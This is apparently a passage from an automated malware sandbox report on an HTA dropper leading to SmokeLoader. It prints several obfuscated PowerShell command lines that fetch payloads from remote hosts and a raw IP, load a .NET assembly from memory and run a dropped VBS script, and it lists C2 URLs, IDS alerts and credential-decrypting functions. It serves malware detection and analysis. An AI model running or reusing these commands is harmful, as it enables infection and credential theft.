ZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFT
                Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5592, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.cmdline", ProcessId: 6588, ProcessName: csc.exe
                Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\djvbaae, CommandLine: C:\Users\user\AppData\Roaming\djvbaae, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\djvbaae, NewProcessName: C:\Users\user\AppData\Roaming\djvbaae, OriginalFileName: C:\Users\user\AppData\Roaming\djvbaae, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\djvbaae, ProcessId: 3052, ProcessName: djvbaae
                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5592, TargetFilename: C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5592, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" , ProcessId: 6964, ProcessName: wscript.exe
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5592, TargetFilename: C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.cmdline
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))", CommandLine: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0c
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe

                Data Obfuscation

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5592, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.cmdline", ProcessId: 6588, ProcessName: csc.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-18T18:37:26.824559+010020490381A Network Trojan was detected142.215.209.78443192.168.2.449731TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-18T18:38:09.197379+010020391031A Network Trojan was detected192.168.2.44978146.173.214.2480TCP
                2024-11-18T18:38:17.024024+010020391031A Network Trojan was detected192.168.2.44981746.173.214.2480TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-18T18:37:18.758930+010028587951A Network Trojan was detected192.168.2.449730107.172.44.17880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-18T18:38:09.370502+010028298482Potentially Bad Traffic46.173.214.2480192.168.2.449781TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://prolinice.ga/index.phpAvira URL Cloud: Label: malware
                Source: http://vilendar.ga/index.phpAvira URL Cloud: Label: malware
                Source: http://prolinice.ga:80/index.phpAvira URL Cloud: Label: malware
                Source: 0000000D.00000002.2175832191.0000000000E10000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}
                Source: bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htaReversingLabs: Detection: 21%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02D63098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,17_2_02D63098
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02D63717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,17_2_02D63717
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02D63E04 RtlCompareMemory,CryptUnprotectData,17_2_02D63E04
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02D6123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,17_2_02D6123B
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02D611E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,17_2_02D611E1
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02D61198 CryptBinaryToStringA,CryptBinaryToStringA,17_2_02D61198
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02D61FCE CryptUnprotectData,RtlMoveMemory,17_2_02D61FCE
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_006626AC lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,19_2_006626AC
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_0304178C lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,20_2_0304178C
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_0304118D CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,20_2_0304118D
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_0032263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,22_2_0032263E
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_0032245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,22_2_0032245E
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00322404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,22_2_00322404
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 27_2_02D52799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,27_2_02D52799
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 27_2_02D525A4 CryptBinaryToStringA,CryptBinaryToStringA,27_2_02D525A4

                Phishing

                barindex
